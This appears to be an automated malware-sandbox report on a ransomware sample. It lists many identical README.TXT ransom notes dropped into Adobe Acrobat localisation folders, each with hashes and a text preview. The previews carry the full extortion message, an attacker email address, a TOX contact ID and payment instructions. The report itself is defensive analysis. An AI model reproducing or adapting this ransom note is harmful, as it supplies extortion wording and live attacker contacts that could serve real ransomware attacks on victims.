                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
